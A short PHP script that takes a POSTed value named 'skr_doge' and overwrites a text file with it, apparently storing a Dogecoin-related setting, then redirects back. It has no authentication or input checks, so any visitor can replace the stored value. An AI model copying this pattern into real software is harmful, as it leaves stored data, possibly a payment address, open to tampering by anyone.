<?PHP
$skr_doge = $_POST['skr_doge'];
$fp = fopen("../doge.txt", 'a');
ftruncate($fp, 0);
$log = fopen("../doge.txt","at");
fwrite($log,"$skr_doge");
fclose($log);
header("location:javascript://history.go(-1)");
?>